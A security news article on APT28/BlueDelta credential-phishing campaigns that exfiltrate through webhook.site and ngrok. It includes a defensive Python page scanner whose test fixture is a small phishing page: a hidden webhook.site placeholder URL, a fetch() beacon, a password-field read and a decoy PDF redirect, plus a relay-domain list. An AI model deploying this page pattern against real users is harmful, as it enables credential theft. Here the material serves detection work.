Researchers uncovered a phishing setup that relies on a concealed HTML form element containing a webhook[.]site URL. JavaScript embedded in the page quietly sends a “page opened” signal, captures any credentials entered by the victim, and forwards them to the webhook endpoint. After the data is sent, the victim is redirected back to a PDF hosted on the legitimate website, reducing suspicion.
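The page structure described above (a hidden element holding a relay URL, inline script that beacons and exfiltrates, then a redirect to a PDF) gives a defender three concrete signals to look for when triaging a captured landing page. The following detector is an added example written for this article, not code from the researchers or from any product mentioned here; the relay-domain list, the regex heuristics, and both sample pages are assumptions constructed for illustration, and the webhook.site path in the sample is a placeholder, not a real endpoint.

```python
import re
from html.parser import HTMLParser

# Assumption: relay/tunnel hosts commonly abused as disposable exfil endpoints.
# Extend this list from your own telemetry.
RELAY_DOMAINS = ("webhook.site", "ngrok.io", "ngrok-free.app", "ngrok.app")


class _Collector(HTMLParser):
    """Collects values stored in hidden elements and the text of inline scripts."""

    def __init__(self):
        super().__init__()
        self.hidden_values = []   # attribute values found on hidden inputs/forms
        self.scripts = []         # raw inline script bodies
        self._in_script = False

    def handle_starttag(self, tag, attrs):
        a = {k: (v or "") for k, v in attrs}
        if tag == "script":
            self._in_script = True
            self.scripts.append("")
        if tag in ("input", "form", "div", "span"):
            style = a.get("style", "").replace(" ", "").lower()
            hidden = (
                a.get("type", "").lower() == "hidden"
                or "display:none" in style
                or "visibility:hidden" in style
            )
            if hidden:
                for key in ("value", "action", "data-url"):
                    if a.get(key):
                        self.hidden_values.append(a[key])

    def handle_endtag(self, tag):
        if tag == "script":
            self._in_script = False

    def handle_data(self, data):
        if self._in_script and self.scripts:
            self.scripts[-1] += data


def analyze_page(html: str) -> list:
    """Return a list of human-readable findings; an empty list means no signal fired."""
    parser = _Collector()
    parser.feed(html)
    findings = []

    # Signal 1: a hidden element carries a URL pointing at a disposable relay service.
    for value in parser.hidden_values:
        if any(domain in value.lower() for domain in RELAY_DOMAINS):
            findings.append(f"hidden element references relay service: {value}")

    js = "\n".join(parser.scripts)

    # Signal 2: inline script both touches a password field and performs a network send.
    sends = re.search(r"\b(fetch|XMLHttpRequest|navigator\.sendBeacon)\s*\(", js)
    reads_pw = re.search(r"\b(password|passwd|pwd)\b", js, re.I)
    if sends and reads_pw:
        findings.append("inline script reads a password field and performs a network send")

    # Signal 3: script-driven redirect to a PDF, the decoy step described in the report.
    if re.search(r"(window\.location(\.href)?|location\.replace)\s*[=(]\s*['\"][^'\"]*\.pdf",
                 js, re.I):
        findings.append("inline script redirects the visitor to a PDF")

    return findings


# Constructed sample: the tell-tale pieces of a page like the one described (placeholder URL).
SUSPECT_PAGE = """<html><body>
<form id="login"><input name="user"><input name="password" type="password"></form>
<form style="display: none">
  <input type="hidden" id="exfil" value="https://webhook.site/00000000-PLACEHOLDER">
</form>
<script>
var url = document.getElementById('exfil').value;
fetch(url, {method: 'POST', body: 'opened'});
var pw = document.querySelector('[name=password]').value;
window.location.href = '/report.pdf';
</script></body></html>"""

# Constructed sample: an ordinary login page with a hidden CSRF token, which must not fire.
BENIGN_PAGE = """<html><body>
<form action="/login" method="post">
  <input type="hidden" name="csrf" value="abc123">
  <input name="username"><input name="password" type="password">
</form>
<script>document.title = 'Sign in';</script>
</body></html>"""

if __name__ == "__main__":
    for name, page in (("suspect", SUSPECT_PAGE), ("benign", BENIGN_PAGE)):
        print(name, analyze_page(page))
```

The three checks are deliberately independent so a single hit can be scored rather than treated as proof; a hidden CSRF token is a hidden input too, which is why the first check keys on the relay domain rather than on hiddenness alone. Run it over the HTML of a reported URL before visiting it interactively, and feed the relay domains it surfaces into proxy and DNS blocklists.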
The threat group known as APT28, also tracked as BlueDelta, has been linked to several other credential-harvesting campaigns observed throughout 2025.
- June 2025: Attackers deployed a fake password reset page designed to imitate a Sophos VPN portal. The page was hosted on infrastructure provided by InfinityFree. Credentials submitted by victims were harvested before users were redirected to a legitimate Sophos VPN login page belonging to an unnamed E.U.-based think tank.
- September 2025: Another campaign used credential-stealing pages hosted on InfinityFree domains. Victims were shown false warnings claiming their passwords had expired. After entering their login details, users were redirected to real authentication pages tied to a military organization in the Republic of North Macedonia and an IT services firm in Uzbekistan.
- April 2025: In a separate operation, attackers set up a counterfeit Google password reset page hosted through Byet Internet Services. Stolen credentials were then exfiltrated through an ngrok endpoint.
According to analysis from a Mastercard-owned security firm, BlueDelta’s repeated misuse of legitimate hosting and relay services highlights its ongoing dependence on disposable infrastructure to collect and transmit stolen credentials. The activity reflects the GRU’s continued focus on credential harvesting as a low-cost, effective way to gather intelligence in support of Russian strategic objectives.